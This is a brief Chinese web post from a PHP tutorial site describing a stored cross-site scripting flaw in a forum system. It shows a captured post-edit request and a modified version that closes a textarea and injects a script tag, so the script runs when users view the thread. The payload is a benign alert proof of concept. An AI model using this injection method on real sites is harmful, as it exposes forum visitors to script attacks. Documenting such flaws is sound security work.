来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 通杀所有版本先随便发布或回复一个帖子 内容要上传一张图片 发布成功后 编辑内容 并抓包 下面是抓包的内容 得到图片路径forumID=14threadID=271postID=373postType=fileCount=0title=Re%3A%E6%B5%8B%...
通杀所有版本
先随便发布或回复一个帖子 内容要上传一张图片 发布成功后 编辑内容 并抓包 下面是抓包的内容 得到图片路径
forumID=14&threadID=271&postID=373&postType=&fileCount=0&title=Re%3A%E6%B5%8B%E8%AF%95%E5%B8%96&content=111111111112222222222%3Cimg+src%3D%22%2FBBS%2Fupload%2F2013%2F12%2Ft_27164555796.jpg
修改数据包 在图片地址后面加入攻击代码
forumID=14&threadID=271&postID=373&postType=&fileCount=0&title=Re%3A%E6%B5%8B%E8%AF%95%E5%B8%96&content=111111111112222222222%3Cimg+src%3D%22%2FBBS%2Fupload%2F2013%2F12%2Ft_27164555796.jpg"></textarea><script>alert(/xss/)</script>
再次提交
用户访问帖子时即可触发~
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com